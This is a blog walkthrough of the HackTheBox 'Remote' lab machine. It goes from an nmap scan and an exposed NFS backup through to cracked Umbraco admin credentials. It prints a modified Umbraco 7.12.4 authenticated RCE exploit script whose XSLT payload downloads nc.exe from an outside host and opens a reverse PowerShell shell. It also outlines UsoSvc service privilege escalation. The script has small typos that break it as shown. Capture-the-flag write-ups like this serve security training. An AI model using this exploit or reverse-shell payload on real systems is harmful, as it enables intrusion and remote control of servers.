HackTheBox Remote Writeup (10.10.10.180)

by Navin · Published March 24, 2020 · Updated September 5, 2020

Hello there, welcome back again. Today I’m going to do the walkthrough and write-up on the new HackTheBox Windows easy machine Remote (10.10.10.180) by mrb3n.

HackTheBox Remote Write-up (10.10.10.180)

This machine is all about finding Windows NFS (Network File System), obtaining password hash, cracking it, getting shell as a user, exploiting Umbraco CMS, getting RCE and finally getting the shell as administrator. I used Umbraco CMS – Remote Code Execution exploit by Gregory DRAPERI & Hugo BOUTINON.

Let’s get started then.

GETTING MY FOOT IN

As always, I added the machine IP (10.10.10.180) to my hosts file as remote.htb and started with an intense NMAP port scan.

The NMAP Scan

$ nmap -T5 -sC -p- -oA nmap.scan remote.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-24 09:55 +03
Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m17s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-24T07:10:04
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 849.48 seconds

# root @ ns09 in ~/htb/remote [10:09:16]

I found many open ports, majorly Windows RPC ports, Port 80, FTP on 21, port 111 etc.

Upon checking port 80, there is a website “Acme Widgets” running.

The website or the source code did not reveal anything useful, so I proceed to find the hidden directories using GoBuster.

While GoBuster running, I started to reckon the directories detected one by one. There is a blog, an e-commerce store, contact details and there is “/Install” directory. When you see a directory by name “install” you normally stop everything and look in to it, well, I did the same.

When I visit the website http://remote.htb/install it redirected me to http://remote.htb/umbraco/#/login, and I was welcomed me with a login page. 🙂

However, I was not able to go any further because my attempt to brute force the login page failed. I continued run DirBuster and started to look in to other open ports. Until I noticed something unusual.

Windows NFS Mounting

If you clearly noticed the namp scan, there is a port 111 is open. The port 111 RCP Bind normally used to map other RPC services (such as nfs, nlockmgr, quotad, mountd, etc.) to their corresponding port number on the server. Ref

In Linux, you can use showmount command to see the mounted drives and storage from NFS like below:

When I run the showmount command, I noticed the /site_backup storage is mounted and is available for everyone.

With a very simple effort you can mount the public directory to your Kali machine and read the contents. Linux has an option called “Mount” which is similar to the map network drive option in Windows.

Mounting the NFS Share

I created a directory “site_backup” inside my Remote machine working directory and run the command mount -t nfs remote.htb:/site_backups ./site_backup and I have a copy of the site_backup mounted to my Kali machine.

I started to look the directories and files inside the site_backup. The file Web.config didn’t reveal much info. A post in HTB Forums Remote thread, a user mentioned a file with “*sdf” extension would help, so started to look for the file. After spending some time I found Umbraco.sdf inside the directory App_data.

The Umbraco.sdf is a database used by Umbraco CMS. A quick google search led me to this article that shows, How to setting up Umbraco with Visual Studio. This article as well suggests the .sdf file can be opened using MS SQL.

I moved umbraco.config and Umbraco.sdf in to my Windows host machine to work with Visual Studio. Unfortunately, for some reason, I wasn’t able to open the file using my Visual Studio, I keep getting corrupted error. So as a last resort, I tried to open it using my EditPlus text editor (Funny, but this actually works, I had opened a lot of database files using EditPlus and read the contents).

After a little clean-up I made the list of hashed password of admin@htb.local and users smith@htb.local and ssmith@htb.local.

Hashed Credentials:

adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32

Cracking The Hash using John

I copied the Admin password hash to kali and used John to crack. It took just a couple of seconds to crack.

Clear test credetials:

admin@htb.local:baconandcheese

Next step is logging in to the CMS using the credentials I just cracked.

And I’m in the admin dashboard of Umbraco CMS.

Exploit

After logging the things went pretty straightforward. As I already know the Umbraco version 7.12.4 is exploitable, I without wasting much time download the related exploit from exploit-db https://www.exploit-db.com/exploits/46153 and modified it as per my requirement and add the reverse shell.

My Final Exploit with Payload:

# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A
import requests;
from bs4 import BeautifulSoup;
def print_dict(dico):
    print(dico.items());
print("Start");
# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "i -uri http://10.10.14.5:8080/nc.exe -outfile /nav1n/nc.exe;/nav1n/nc.exe 10.10.14.5 4444 -e powershell"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';
in = "admin@htb.local;
password="baconandcheese";
host = "http://remote.htb";
# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
ur1 = s.get(url_main);
print_dict(r1.cookies);
# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);
# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);
soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);
print("End");

As soon as my exploit is ready, I run it from Kali terminal and boom, I have the reverse shell as inetsrv.

User.txt

Once the reverse-shell is connected, I immediately found the User.txt in the Public user’s desktop. I run the exploit twice because I lost the connection – so here are two user flags 😉

Getting The Root

After spending sometime without much clue, I got a tip from one of HTB fellow user. As per him I could modify the service starts with “Usxxxc”. I found the service he mentioned is UsoSvc – Update Orchestrator Service, which is a Windows Update service.

A quick search showed me the UsoSvc exploit under PayloadAllTheThings.

Let us get in to the real business now,

For a successful exploit we need a service account. In our case we have UsoSvc.

Exploit Procedures

First, stop the service UsoSvc using sc.exe stop UsoSvc command.
Then, add the custom exploit to the windows bin path for the service account. When the service is restarted, it should run the reverse shell script and it should give the reverse shell in the listener.
And lastly, Restart the service using sc.exe start usosvc command.